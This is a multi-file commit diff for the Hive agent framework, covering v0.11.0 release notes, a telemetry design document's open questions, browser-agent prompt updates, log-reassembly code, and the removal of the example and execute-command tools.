Tenant aggregation, daily/monthly rollups, quota enforcement, OTel export, business dashboards. (U6-U8.) Defer until business confirms billing model — the answer (per-seat vs. per-token vs. per-colony) changes the data model.
Slices 1 and 2 are mostly **wiring** — the events exist, the schemas exist, the storage paths exist. Slice 3 is the **first slice that introduces a new architectural boundary** (local→cloud transport + identity + privacy contract); everything novel about the business ask lives there. Slice 4 is **business design**, not engineering scope.
---
## 10. Open questions for the architect
The first four are direct consequences of the local-first / cloud-required gap surfaced in §3.8 and §8.2.
1. **Cloud transport shape — Shape A, B, or C from §3.8?** This decision is upstream of the entire data model. Recommend Shape B (outbox push) absent a strong privacy argument for Shape A.
2. **Redaction default for the cloud payload.** What goes (model, token counts, latency, tool names, status) vs. what stays local (prompts, tool arguments, tool results, file paths, conversation content)? Need a written allowlist before Slice 3 starts.
3. **Self-hosted / air-gapped users.** If the cloud sink is unreachable or disabled, what does the runtime do — buffer indefinitely, drop oldest, or refuse to start? Defaults differ for OSS vs. SaaS distributions.
4. **Identity binding point.** Do we attach `user_id` / `tenant_id` at event-emit time (invasive, threads identity through every node), at session-create time (clean, requires session-level auth), or at outbox-flush time (simplest, but loses per-event provenance)? Recommend session-create.
5. Do we need quota *enforcement*, or only quota *visibility* in v1?
6. Frontend doc: are status and usage rendered in the same panel or different surfaces? This affects whether we ship one merged endpoint or two.
7. Are we willing to pay the cost-table maintenance burden, or should "cost" stay labeled as estimated and not be used for invoicing?
---
## Appendix — Pointers
- Queen lifecycle: [core/framework/agents/queen/nodes/__init__.py](../../core/framework/agents/queen/nodes/__init__.py)
- Event bus + types: [core/framework/host/event_bus.py](../../core/framework/host/event_bus.py)
- Runtime log schemas: [core/framework/tracker/runtime_log_schemas.py](../../core/framework/tracker/runtime_log_schemas.py)
- Runtime log store: [core/framework/tracker/runtime_log_store.py](../../core/framework/tracker/runtime_log_store.py)
- LLM accounting: [core/framework/llm/provider.py](../../core/framework/llm/provider.py), [model_catalog.py](../../core/framework/llm/model_catalog.py)
- Colony progress DB: [core/framework/host/progress_db.py](../../core/framework/host/progress_db.py)
- Task events: [core/framework/tasks/events.py](../../core/framework/tasks/events.py)
- Session HTTP: [core/framework/server/routes_sessions.py](../../core/framework/server/routes_sessions.py)
- SSE primitive: [core/framework/server/sse.py](../../core/framework/server/sse.py)
- Worker health: [core/framework/tools/worker_monitoring_tools.py](../../core/framework/tools/worker_monitoring_tools.py)
- Config / env vars: [core/framework/config.py](../../core/framework/config.py)
+1 -1
View File
@@ -115,7 +115,7 @@ Hive LLM:
Notes:
- Set `provider` to `hive`
- Common Hive model values are `queen`, `kimi-2.5`, and `GLM-5`
- Common Hive model values are `queen`, `kimi-k2.5`, and `GLM-5`
- Hive LLM requests use the Hive endpoint at `https://api.adenhq.com`
### Search & Tools (optional)
+1 -1
View File
@@ -414,7 +414,7 @@ cd core && uv run python tests/dummy_agents/run_all.py --verbose
| parallel_merge | 4 | Fan-out/fan-in, failure strategies |
| retry | 4 | Retry mechanics, exhaustion, `ON_FAILURE` edges |
| feedback_loop | 3 | Feedback cycles, `max_node_visits` |
| worker | 4 | Real MCP tools (`example_tool`, `get_current_time`, `save_data`/`load_data`) |
| worker | 4 | Real MCP tools (`get_current_time`, `save_data`/`load_data`) |
Typical runtime is 1–3 minutes depending on provider latency.
+127
View File
@@ -0,0 +1,127 @@
# 🐝 Hive Agent v0.11.0: Action Plans, Charts, and a Cleaner Queen
> Major features released in Hive 0.11: Queen now keeps an action plan for everything and can produce charts to do analytics for you. The conversation and agent experience are also much improved thanks to a major Queen prompt and tools refactor.
---
## ✨ Highlights
### 📋 Queen now keeps an action plan for everything
A new file-backed task system gives Queen a persistent, structured plan for every conversation — visible to the user, editable on the fly, and surviving session reload.
- **File-backed task store** under `core/framework/tasks/` with full CRUD, scoping, hooks, and reminders. Tasks live on disk so they outlast a single agent run and can be inspected, replayed, or shared between Queen and colony workers.
- **Multi-task creation in one call** — Queen can stage a whole plan up front instead of dripping out one task at a time, then tick items off as it works.
- **Colony task templates** — colonies can publish a template task list that Queen picks up when the colony is invoked, so recurring workflows start with the same plan every time.
- **Live task list in the UI** — a new `TaskListPanel` renders the plan in real time next to the chat, with item status flowing through the event bus as Queen marks tasks done.
- **Task reminders + hooks** wire into Queen's loop so the plan stays in front of the model, and structural blockers that previously prevented `task_*` tool calls are now resolved.
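The properties the bullets above describe (disk persistence, multi-task staging, survival across session reload) can be sketched with a toy store. This is illustrative only; the real subsystem lives in `core/framework/tasks/` and its API is not shown here:

```python
import json
import tempfile
from pathlib import Path

class TaskStore:
    """Toy file-backed task store: tasks persist as JSON on disk,
    so they outlast a single agent run. Not the framework's real API."""
    def __init__(self, path: Path):
        self.path = path
        self.tasks = json.loads(path.read_text()) if path.exists() else []

    def create_many(self, titles):
        # Stage a whole plan in one call, like Queen's multi-task tool.
        self.tasks.extend({"title": t, "status": "pending"} for t in titles)
        self._flush()

    def complete(self, title):
        for task in self.tasks:
            if task["title"] == title:
                task["status"] = "done"
        self._flush()

    def _flush(self):
        self.path.write_text(json.dumps(self.tasks, indent=2))

store = TaskStore(Path(tempfile.mkdtemp()) / "tasks.json")
store.create_many(["collect data", "draw chart"])
store.complete("collect data")
# A fresh load from disk sees the same plan — the "survives reload" property.
assert TaskStore(store.path).tasks[0]["status"] == "done"
```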
### 📊 Charting capability for analytics
Queen can now produce real charts inline in the conversation, not just describe them.
- **New `chart_tools` MCP server** with ECharts and Mermaid renderers, an OpenHive theme, and a `chart-creation-foundations` skill that teaches Queen when to chart vs. when to table.
- **Inline chart rendering in chat** — `EChartsBlock` and `MermaidBlock` components render the chart spec directly in the transcript; tool results get a contentful display with `ChartToolDetail` instead of a JSON dump.
- **Chart spec normalization** in the renderer keeps Y-axis scaling, series colors, and theme tokens consistent regardless of how Queen phrases the spec.
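The kind of normalization described above can be pictured as defaulting missing axes and pinning series colors to a theme palette. A minimal sketch, with assumed names throughout (the real renderer lives in `tools/src/chart_tools/` and the palette values here are stand-ins):

```python
# Illustrative normalizer for an ECharts-style spec dict.
THEME_COLORS = ["#f5a623", "#4a90d9", "#7ed321"]  # stand-in palette

def normalize_spec(spec: dict) -> dict:
    out = dict(spec)
    # The model sometimes omits axes entirely; supply sane defaults.
    out.setdefault("xAxis", {"type": "category"})
    out.setdefault("yAxis", {"type": "value", "scale": True})
    # Assign stable theme colors so series look consistent across charts.
    for i, series in enumerate(out.get("series", [])):
        series.setdefault("itemStyle", {})
        series["itemStyle"].setdefault(
            "color", THEME_COLORS[i % len(THEME_COLORS)])
    return out

spec = normalize_spec({"series": [{"type": "bar", "data": [3, 1, 4]}]})
assert spec["yAxis"]["scale"] is True
assert spec["series"][0]["itemStyle"]["color"] == "#f5a623"
```

Keeping this in the renderer, rather than in the prompt, means the guarantee holds regardless of how Queen phrases the spec.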
### 🧹 Major Queen prompt + tools refactor
The biggest cleanup of Queen's tool surface and prompt since v0.7. Fewer, sharper tools; a shorter, more focused prompt; and a clearer model of what Queen has access to vs. what colonies do.
- **File ops consolidated** — `apply_diff`, `apply_patch`, `hashline_edit`, the old `data_tools`, `grep_search`, and the legacy `coder_tools_server` are gone. A single rewritten `file_ops` module covers read / search / list / edit with a more predictable interface and ~1.7k fewer lines on net.
- **Search and list-files unified** into one toolkit so Queen stops juggling near-duplicate variants.
- **Browser tools audit** — interactions, navigation, tabs, and lifecycle trimmed and consolidated; `web_scrape` and `browser_open` merged into a single web-search-and-open path.
- **New shell/terminal toolkit** (`shell_tools`) — replaces the old `execute_command_tool` and the inline command sanitizer with a typed module that has proper job control, PTY sessions, ring-buffered output, semantic exit codes, and a destructive-command warning gate. Five new preset skills (`shell-tools-foundations`, `-fs-search`, `-job-control`, `-pty-sessions`, `-troubleshooting`) teach Queen the new surface.
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` shrunk by ~900 lines as deprecated default tools came out.
- **Prompt simplification + improvements** — Queen's node prompts dropped redundant `_queen_style` blocks, tightened phrasing, and now lean on the task system for plan-keeping instead of restating the plan every turn.
- **Tools editor frontend grouping** — `ToolsEditor.tsx` groups tools by category so configuring a queen profile is no longer a flat scroll through 80+ entries.
---
## 🆕 What's New
### Tasks & Action Plans
- **`core/framework/tasks/`** — full task subsystem: `store`, `models`, `events`, `hooks`, `reminders`, `scoping`, plus a `tools/` package exposing session and colony task tools to Queen. (@RichardTang-Aden)
- **`POST /api/tasks` routes** for the frontend to read and mutate the live plan. (@RichardTang-Aden)
- **`TaskListPanel` + `TaskItem` + `TaskListContext`** on the frontend render the plan in real time. (@RichardTang-Aden)
- **Multi-task creation tool** lets Queen stage a whole plan in one call. (@RichardTang-Aden)
- **Colony task templates** — colonies ship with a default task list that Queen adopts on entry. (@RichardTang-Aden)
- **Hook + reminder fixes** so Queen reliably uses `task_*` tools instead of skipping them. (@RichardTang-Aden)
### Charts
- **`tools/src/chart_tools/`** — new MCP server with `renderer.py`, `theme.py`, `tools.py`, plus bundled `echarts.min.js` and `mermaid.min.js`. (@TimothyZhang7)
- **`chart-creation-foundations` skill** teaches Queen when and how to chart. (@TimothyZhang7)
- **`EChartsBlock` / `MermaidBlock` / `ChartToolDetail`** components render charts inline. (@TimothyZhang7)
- **OpenHive chart theme** (`openhiveTheme.ts`) keeps chart styling consistent with the rest of the UI. (@TimothyZhang7)
- **Chart spec normalization** in the renderer fixes Y-axis edge cases and series defaults. (@TimothyZhang7)
### Queen Prompt & Tools Refactor
- **Major file ops refactor** — single rewritten `file_ops` module replaces `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, `data_tools`, and the legacy `coder_tools_server`. (@RichardTang-Aden)
- **Edit-file refactor** with a tighter API surface and ~560 lines of dead `test_file_ops_hashline.py` removed. (@RichardTang-Aden)
- **Search + list-files consolidation** into one toolkit. (@RichardTang-Aden)
- **Browser tools audit** — navigation, interactions, lifecycle, and tabs trimmed; `web_scrape` and browser-open merged. (@RichardTang-Aden)
- **`shell_tools` package** replaces `execute_command_tool` with proper job control, PTY sessions, ring-buffered output, semantic exit codes, and destructive-command warnings. (@TimothyZhang7)
- **Five new shell preset skills** plus reference docs (`exit_codes.md`, `find_predicates.md`, `ripgrep_cheatsheet.md`, `signals.md`). (@TimothyZhang7)
- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` lost ~900 lines. (@RichardTang-Aden)
- **Autocompaction + concurrency tools updated** to play nicely with the new tool registry. (@RichardTang-Aden)
- **Prompt simplification** — `nodes/__init__.py` dropped redundant `_queen_style` block and tightened phrasing across nodes. (@RichardTang-Aden)
- **`ToolsEditor` grouping** — frontend tool-config screen now groups tools by category. (@RichardTang-Aden)
### Conversation & Agent Experience
- **`ask_user` questions surface in the chat transcript** instead of vanishing into a side panel, and the question bubble now defers until the user actually answers. (@bryan)
- **New-session navigation with Queen warm-up UI** — new `queen-routing.tsx` page handles the warm-up so the user sees progress instead of a blank screen. (@bryan)
- **Sync tool result contentful display** — tool results render as structured cards (charts, file diffs, etc.) instead of raw JSON. (@TimothyZhang7)
### Vision Fallback
- **Vision model retry + fallback** — non-vision models can now route image inputs through a captioning step instead of failing. (@RichardTang-Aden)
- **Vision fallback with intent** — caption prompts incorporate the user's intent so the caption is task-relevant. (@RichardTang-Aden)
- **Vision fallback auth** — fallback path now uses the right credentials per provider. (@RichardTang-Aden)
- **Looser max-token cap** on vision fallback for models that spend output tokens on internal thinking. (@RichardTang-Aden)
- **Vision fallback model usage logging** for cost visibility. (@RichardTang-Aden)
### Colonies
- **`POST /api/colonies/import`** — onboard a colony from a `tar` / `tar.gz` upload. 50 MB cap, manual path-traversal validation (Python 3.11 compatible), symlinks/hardlinks/devices rejected, mode bits masked. Tests cover happy path, name override, replace flag, traversal, absolute paths, and corrupt archives. (@RichardTang-Aden)
- **Refactored colony routes** — `routes_colonies.py` gained ~450 lines of structure for import/export/list flows. (@TimothyZhang7)
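The per-member checks the import route describes (traversal, absolute paths, links, devices, mode masking) can be sketched roughly as below. This is a simplified illustration of the described behavior, not the route's actual code, and `validate_member` is a hypothetical name:

```python
import tarfile
from pathlib import Path

def validate_member(member: tarfile.TarInfo, dest: Path) -> None:
    """Reject tar members that could escape or abuse the extraction dir."""
    # Symlinks, hardlinks, and device nodes are rejected outright.
    if member.issym() or member.islnk() or member.isdev():
        raise ValueError(f"forbidden member type: {member.name}")
    # Resolving dest/name catches both '../' traversal and absolute paths:
    # the result must still sit inside the destination directory.
    target = (dest / member.name).resolve()
    if not target.is_relative_to(dest.resolve()):
        raise ValueError(f"path escapes destination: {member.name}")
    member.mode &= 0o755  # mask mode bits (no setuid/sticky/world-write)
```

Doing this manually keeps the route working on Python 3.11, where the stdlib's newer extraction-filter machinery cannot be assumed.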
### MCP & Tools
- **SimilarWeb V5 integration** — 29 new MCP tools covering traffic & engagement, competitor intelligence, keywords/SERP, audience demographics, and segment analysis. Includes credential spec, health checker, README, and tests on Ubuntu and Windows. (#7066)
- **MCP registry initialization fix** — registry no longer races on first install. (@RichardTang-Aden)
---
## 🐛 Bug Fixes
- **Initial install** path resolution — hardcoded `HIVE_HOME` references replaced; all agent paths now prefixed by the resolved `HIVE_HOME`. (@RichardTang-Aden)
- **Frontend recovery** after a broken state on session reload. (@RichardTang-Aden)
- **Compaction issues** when the agent loop runs into the buffer mid-stream. (@RichardTang-Aden)
- **LiteLLM patch** for a streaming-usage edge case. (@RichardTang-Aden)
- **`ask_user` question bubble** now defers until the user answers. (@bryan)
- **Incubating-mode approval guidance** correctly injects into the prompt. (@RichardTang-Aden)
- **LLM debugger** — fixed timeline order and tool-call display. (@RichardTang-Aden)
- **Shell split-command** parsing fix. (@TimothyZhang7)
- **Chart Y-axis** + **chart spec normalization** edge cases. (@TimothyZhang7)
- **Scroll behavior** on certain element selectors. (@bryan)
- **CI fixes**: skills `HIVE_HOME` refactor regressions, `run_parallel_workers` losing task text on spawn, `test_capabilities` deprecated model identifiers, `test_colony_runtime_overseer` Windows flake. (#7141, #7149)
- **Orphan Zoho CRM test directory** removed under `src/` after the MCP refactor. (#7142)
- **Credentials** — `EnvVarStorage.exists` now matches `load` semantics for empty values. (#5680)
---
## 🚀 Upgrading from v0.10.5
No migration required. Pull `main` at `v0.11.0` and restart Hive — existing `~/.hive/` profiles, queens, colonies, and sessions keep working.
A few things to know:
1. **Queen's default tool surface changed.** If you have a queen profile pinned to a removed tool (e.g. `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, the old `execute_command_tool`), it'll fall back to the consolidated replacements. Custom profiles referencing those tool names should be updated.
2. **Old `queen_lifecycle_tools` entries are gone.** If you wired any external code against those defaults, switch to the new task system.
3. **Task plan is now persistent.** Queen will start staging a plan automatically on new sessions — if you don't want the panel, you can collapse it from the layout.
Plan the work. Chart the result. 🐝
+1 -1
View File
@@ -334,7 +334,7 @@ Update incrementally — do not rewrite from scratch each time.
**Background:** Replaces the older in-memory `_batch_ledger` (and `_working_notes → Current Plan` decomposition) — both were removed on 2026-04-15 because they duplicated state that belongs in SQLite. The queue, per-task `steps` decomposition, and `sop_checklist` hard-gates now all live in `progress.db` and are authoritative.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `execute_command_tool`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Protocol (injected into system prompt):** Workers receive `db_path` and `colony_id` (and optionally `task_id`) in their spawn message and interact with the ledger via `sqlite3` through `terminal_exec`. The full claim → load plan → execute step → SOP-gate → mark done loop is documented in the skill's `SKILL.md`.
**Tables:**
- `tasks` — queue: pending → claimed → done|failed, with `worker_id` and atomic claim tokens
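The claim step of the loop described above can be sketched as an atomic SQLite update: the `UPDATE ... WHERE status='pending'` only succeeds if the row is still unclaimed, so two workers can never take the same task. Column names beyond those listed are assumptions, and workers actually issue this through the shell tool rather than a Python helper:

```python
import sqlite3
import uuid

def claim_next_task(db_path: str, worker_id: str):
    """Atomically claim one pending task; return its id, or None."""
    token = uuid.uuid4().hex  # claim token, per the table description
    con = sqlite3.connect(db_path, isolation_level=None)  # autocommit
    try:
        row = con.execute(
            "SELECT id FROM tasks WHERE status='pending' ORDER BY id LIMIT 1"
        ).fetchone()
        if row is None:
            return None
        cur = con.execute(
            "UPDATE tasks SET status='claimed', worker_id=?, claim_token=? "
            "WHERE id=? AND status='pending'",
            (worker_id, token, row[0]),
        )
        # rowcount == 0 means another worker won the race; caller retries.
        return row[0] if cur.rowcount == 1 else None
    finally:
        con.close()
```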
@@ -17,16 +17,15 @@ map_search_gcu = NodeSpec(
You are a browser agent. Your job: Search Google Maps for the provided query and extract business names and website URLs.
## Workflow
1. browser_start
2. browser_open(url="https://www.google.com/maps")
3. use the url query to search for the keyword
3.1 alternatively, use browser_type or browser_click to search for the "query" in memory.
4. browser_wait(seconds=3)
5. browser_snapshot to find the list of results.
6. For each relevant result, extract:
1. browser_open(url="https://www.google.com/maps") # lazy-creates the context
2. use the url query to search for the keyword
2.1 alternatively, use browser_type or browser_click to search for the "query" in memory.
3. browser_wait(seconds=3)
4. browser_snapshot to find the list of results.
5. For each relevant result, extract:
- Name of the business
- Website URL (look for the website icon/link)
7. set_output("business_list", [{"name": "...", "website": "..."}, ...])
6. set_output("business_list", [{"name": "...", "website": "..."}, ...])
## Constraints
- Extract at least 5-10 businesses if possible.
@@ -24,13 +24,12 @@ Focus on:
- Hardware/Silicon breakthroughs
## Instructions
1. browser_start
2. For each handle:
a. browser_open(url=f"https://x.com/{handle}")
1. For each handle:
a. browser_open(url=f"https://x.com/{handle}") # lazy-creates the context on first call
b. browser_wait(seconds=5)
c. browser_snapshot
d. Parse relevant tech news text
3. set_output("raw_tweets", consolidated_json)
2. set_output("raw_tweets", consolidated_json)
""",
)
+6 -4
View File
@@ -244,12 +244,14 @@ def main() -> None:
logger.error("Failed to connect to GCU server: %s", e)
sys.exit(1)
# Auto-start browser context so tools work immediately
# Warm the browser context so the first interactive call doesn't pay the
# cold-start round trip. about:blank lazy-creates the context just like
# a real URL would, without committing to a destination page.
try:
result = client.call_tool("browser_start", {})
logger.info("browser_start: %s", result)
result = client.call_tool("browser_open", {"url": "about:blank"})
logger.info("browser_open(about:blank): %s", result)
except Exception as e:
logger.warning("browser_start failed (may already be started): %s", e)
logger.warning("browser warm-up failed (may already be running): %s", e)
app = create_app()
+1 -1
View File
@@ -457,7 +457,7 @@ let currentView = 'grid';
// Tool categories for sidebar grouping
const CATEGORIES = {
'Lifecycle': ['browser_setup', 'browser_start', 'browser_stop', 'browser_status'],
'Lifecycle': ['browser_setup', 'browser_stop', 'browser_status'],
'Tabs': ['browser_tabs', 'browser_open', 'browser_close', 'browser_close_all', 'browser_close_finished', 'browser_activate_tab'],
'Navigation': ['browser_navigate', 'browser_go_back', 'browser_go_forward', 'browser_reload'],
'Interactions': ['browser_click', 'browser_click_coordinate', 'browser_type', 'browser_type_focused', 'browser_press', 'browser_press_at', 'browser_hover', 'browser_hover_coordinate', 'browser_select', 'browser_scroll', 'browser_drag'],
File diff suppressed because it is too large
+70 -9
View File
@@ -64,6 +64,54 @@ def _format_timestamp(raw: str) -> str:
return raw
def _reassemble_records(records: list[dict[str, Any]]) -> list[dict[str, Any]]:
"""Convert new-format (header + turn-delta) records into legacy-shape full turns.
Records lacking ``_kind`` are passed through unchanged. Inputs must be in
file order so headers precede the turns that reference them.
"""
headers: dict[str, dict[str, Any]] = {} # execution_id -> latest session_header
pools: dict[str, dict[str, dict[str, Any]]] = {} # execution_id -> hash -> message body
out: list[dict[str, Any]] = []
for rec in records:
kind = rec.get("_kind")
if kind == "session_header":
eid = str(rec.get("execution_id") or "")
headers[eid] = rec
pools.setdefault(eid, {})
continue
if kind == "turn":
eid = str(rec.get("execution_id") or "")
pool = pools.setdefault(eid, {})
new_msgs = rec.get("new_messages") or {}
if isinstance(new_msgs, dict):
pool.update(new_msgs)
hashes = rec.get("message_hashes") or []
messages = [pool[h] for h in hashes if h in pool]
header = headers.get(eid, {})
out.append(
{
"timestamp": rec.get("timestamp", ""),
"execution_id": eid,
"node_id": rec.get("node_id", ""),
"stream_id": rec.get("stream_id", ""),
"iteration": rec.get("iteration", 0),
"system_prompt": header.get("system_prompt", ""),
"tools": header.get("tools", []),
"messages": messages,
"assistant_text": rec.get("assistant_text", ""),
"tool_calls": rec.get("tool_calls", []),
"tool_results": rec.get("tool_results", []),
"token_counts": rec.get("token_counts", {}),
"_log_file": rec.get("_log_file", ""),
}
)
continue
out.append(rec)
return out
def _is_test_session(execution_id: str, records: list[dict[str, Any]]) -> bool:
if execution_id.startswith("<MagicMock"):
return True
@@ -100,6 +148,9 @@ def _discover_session_summaries(logs_dir: Path, limit_files: int, include_tests:
payload = json.loads(line)
except json.JSONDecodeError:
continue
# session_header is metadata, not a turn — don't count it.
if payload.get("_kind") == "session_header":
continue
eid = str(payload.get("execution_id") or "").strip()
if not eid:
continue
@@ -157,6 +208,10 @@ def _load_session_data(logs_dir: Path, session_id: str, limit_files: int) -> lis
records: list[dict[str, Any]] = []
for path in files:
# Reassemble per-file: each file is self-contained because the writer
# re-emits the session_header on every process start, so we never need
# cross-file state to fill in messages/system_prompt/tools.
file_records: list[dict[str, Any]] = []
try:
with path.open(encoding="utf-8") as handle:
for line_number, raw_line in enumerate(handle, start=1):
@@ -166,17 +221,23 @@ def _load_session_data(logs_dir: Path, session_id: str, limit_files: int) -> lis
try:
payload = json.loads(line)
except json.JSONDecodeError:
payload = {
"timestamp": "",
"execution_id": "",
"_parse_error": f"{path.name}:{line_number}",
"_raw_line": line,
}
if str(payload.get("execution_id") or "").strip() == session_id:
payload["_log_file"] = str(path)
records.append(payload)
records.append(
{
"timestamp": "",
"execution_id": "",
"_parse_error": f"{path.name}:{line_number}",
"_raw_line": line,
"_log_file": str(path),
}
)
continue
if str(payload.get("execution_id") or "").strip() != session_id:
continue
payload["_log_file"] = str(path)
file_records.append(payload)
except OSError:
continue
records.extend(_reassemble_records(file_records))
if not records:
return None
+2 -8
View File
@@ -72,10 +72,7 @@ verbatim; system + credential paths are on a deny list).
| `read_file` | Read file contents (with optional hashline anchors) |
| `write_file` | Create or overwrite a file |
| `edit_file` | Find/replace with fuzzy fallback |
| `hashline_edit` | Anchor-based structural edits validated by line hashes |
| `apply_patch` | Apply a diff_match_patch text |
| `search_files` | Grep file contents (`target='content'`) or list/find files (`target='files'`) — replaces grep, find, and ls |
| `execute_command_tool` | Execute shell commands |
| `save_data` / `load_data` | Persist and retrieve structured data across steps |
| `serve_file_to_user` | Serve a file for the user to download |
| `list_data_files` | List persisted data files in the session |
@@ -176,11 +173,8 @@ tools/
│ ├── file_ops.py # ALL file tools (read, write, edit, hashline_edit, search_files, apply_patch)
│ ├── credentials/ # Credential management
│ └── tools/ # Tool implementations
│ ├── example_tool/
├── file_system_toolkits/ # Shell only — file tools moved to file_ops.py
│ │ ├── security.py
│ │ ├── command_sanitizer.py
│ │ └── execute_command_tool/
│ ├── file_system_toolkits/ # Sandbox path helpers (security.py)
│ └── security.py
│ ├── web_search_tool/
│ ├── web_scrape_tool/
│ ├── pdf_read_tool/
+1 -1
View File
@@ -61,7 +61,7 @@ All replies carry `{ id, result }` or `{ id, error }`.
# 1. At GCU server startup, open ws://localhost:9229/beeline and wait for
# the extension to connect (sends { type: "hello" }).
#
# 2. On browser_start(profile):
# 2. On the first browser tool call for a profile (lazy-start via _ensure_context):
# - Send { id, type: "context.create", agentId: profile }
# - Receive { groupId, tabId }
# - Store groupId in the session object (no Chrome process, no CDP port)
+12 -42
View File
@@ -22,13 +22,11 @@ Usage:
from __future__ import annotations
import contextlib
import difflib
import fnmatch
import os
import re
import subprocess
import sys
import threading as _threading
from collections.abc import Callable
from dataclasses import dataclass, field
@@ -924,8 +922,7 @@ def _apply_hunk(content: str, hunk: _Hunk) -> tuple[str, str | None]:
count = content.count(hunk.context_hint)
if count > 1:
return content, (
f"addition-only hunk: context hint "
f"'{hunk.context_hint}' is ambiguous ({count} occurrences)"
f"addition-only hunk: context hint '{hunk.context_hint}' is ambiguous ({count} occurrences)"
)
if count == 1:
idx = content.find(hunk.context_hint)
@@ -1045,9 +1042,7 @@ def _apply_v4a(
for hunk_idx, hunk in enumerate(op.hunks):
new_content, herr = _apply_hunk(content, hunk)
if herr:
errors.append(
f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}"
)
errors.append(f"Op #{op_idx + 1} update {op.path} hunk #{hunk_idx + 1}: {herr}")
break
content = new_content
fs_state[resolved] = content
@@ -1063,9 +1058,7 @@ def _apply_v4a(
errors.append(f"Op #{op_idx + 1} move {op.path}: {err}")
continue
if os.path.exists(dst_resolved) and fs_exists.get(dst_resolved, True):
errors.append(
f"Op #{op_idx + 1} move {op.path}: destination already exists"
)
errors.append(f"Op #{op_idx + 1} move {op.path}: destination already exists")
continue
fs_state[dst_resolved] = fs_state[resolved]
fs_exists[dst_resolved] = True
@@ -1121,8 +1114,7 @@ def _apply_v4a(
if apply_errors:
return None, (
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n "
+ "\n ".join(apply_errors)
"Apply phase failed (state may be inconsistent — run `git diff` to assess):\n " + "\n ".join(apply_errors)
)
summary_parts: list[str] = []
@@ -1177,10 +1169,7 @@ def _patch_replace(
f"harness can track its state before you edit it."
)
if _fresh.status is Freshness.STALE:
return (
f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with "
f"read_file before editing."
)
return f"Refusing to edit '{path}': {_fresh.detail}. Re-read the file with read_file before editing."
try:
with open(resolved, encoding="utf-8") as f:
@@ -1217,9 +1206,7 @@ def _patch_replace(
break
if matched is None:
close = difflib.get_close_matches(
old_string[:200], content.split("\n"), n=3, cutoff=0.4
)
close = difflib.get_close_matches(old_string[:200], content.split("\n"), n=3, cutoff=0.4)
msg = (
f"Error: Could not find a unique match for old_string in {path}. "
f"Use read_file to verify the current content, or search_files "
@@ -1352,14 +1339,8 @@ EDIT_FILE_PARAMS = {
"tabs vs spaces, smart quotes vs ASCII, and literal \\n/\\t/\\r "
"vs real control chars."
),
"new_string": (
"Replace mode only. Replacement text. Pass an empty string to "
"delete the matched text."
),
"replace_all": (
"Replace mode only. Replace every occurrence instead of requiring "
"a unique match. Default False."
),
"new_string": ("Replace mode only. Replacement text. Pass an empty string to delete the matched text."),
"replace_all": ("Replace mode only. Replace every occurrence instead of requiring a unique match. Default False."),
"patch_text": (
"Patch mode only. Structured patch body. File paths are embedded "
"inside the body via '*** Update File: <path>' / "
@@ -1396,18 +1377,14 @@ SEARCH_FILES_DOC = (
)
SEARCH_FILES_PARAMS = {
"pattern": (
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an "
"'ls'-style listing pass '*' or '*.<ext>'."
"Regex (content mode) or glob (files mode, e.g. '*.py'). For an 'ls'-style listing pass '*' or '*.<ext>'."
),
"target": (
"'content' to grep inside files, 'files' to list/find files. "
"Legacy aliases: 'grep' -> 'content', 'find'/'ls' -> 'files'. "
"Default 'content'."
),
"path": (
"Directory (or, in content mode, a single file) to search. "
"Default '.'."
),
"path": ("Directory (or, in content mode, a single file) to search. Default '.'."),
"file_glob": (
"Restrict content search to filenames matching this glob. "
"Ignored in files mode (use the 'pattern' argument instead)."
@@ -1419,14 +1396,8 @@ SEARCH_FILES_PARAMS = {
"default), 'files_only' (paths only), 'count' (per-file match "
"counts)."
),
"context": (
"Lines of context before and after each match (content mode "
"only). Default 0."
),
"hashline": (
"Content mode: include N:hhhh hash anchors in matched lines. "
"Default False."
),
"context": ("Lines of context before and after each match (content mode only). Default 0."),
"hashline": ("Content mode: include N:hhhh hash anchors in matched lines. Default False."),
"task_id": (
"Optional anti-loop scope key. Defaults to a shared bucket; pass "
"a per-task id when multiple agents share a process."
@@ -1719,4 +1690,3 @@ def register_file_tools(
"Results have not changed — use what you have instead of re-searching.]"
)
return result
-6
View File
@@ -59,11 +59,7 @@ from .docker_hub_tool import register_tools as register_docker_hub
from .duckduckgo_tool import register_tools as register_duckduckgo
from .email_tool import register_tools as register_email
from .exa_search_tool import register_tools as register_exa_search
from .example_tool import register_tools as register_example
from .excel_tool import register_tools as register_excel
from .file_system_toolkits.execute_command_tool import (
register_tools as register_execute_command,
)
from .freshdesk_tool import register_tools as register_freshdesk
from .github_tool import register_tools as register_github
from .gitlab_tool import register_tools as register_gitlab
@@ -157,7 +153,6 @@ def _register_verified(
"""Register verified (stable) tools."""
_verified_before = set(mcp._tool_manager._tools.keys())
# --- No credentials ---
register_example(mcp)
if register_web_scrape:
register_web_scrape(mcp)
register_pdf_read(mcp)
@@ -199,7 +194,6 @@ def _register_verified(
# defaults to CWD here; framework callers that own a session-specific
# workspace should call register_file_tools directly with home set.
register_file_tools(mcp)
register_execute_command(mcp)
register_csv(mcp)
register_excel(mcp)
@@ -1,26 +0,0 @@
# Example Tool
A template tool demonstrating the Aden tools pattern.
## Description
This tool processes text messages with optional transformations. It serves as a reference implementation for creating new tools using the FastMCP decorator pattern.
## Arguments
| Argument | Type | Required | Default | Description |
|----------|------|----------|---------|-------------|
| `message` | str | Yes | - | The message to process (1-1000 chars) |
| `uppercase` | bool | No | `False` | Convert message to uppercase |
| `repeat` | int | No | `1` | Number of times to repeat (1-10) |
## Environment Variables
This tool does not require any environment variables.
## Error Handling
Returns error strings for validation issues:
- `Error: message must be 1-1000 characters` - Empty or too long message
- `Error: repeat must be 1-10` - Repeat value out of range
- `Error processing message: <error>` - Unexpected error
@@ -1,5 +0,0 @@
"""Example Tool package."""
from .example_tool import register_tools
__all__ = ["register_tools"]
@@ -1,52 +0,0 @@
"""
Example Tool - A simple text processing tool for FastMCP.
Demonstrates native FastMCP tool registration pattern.
"""
from __future__ import annotations
from fastmcp import FastMCP
def register_tools(mcp: FastMCP) -> None:
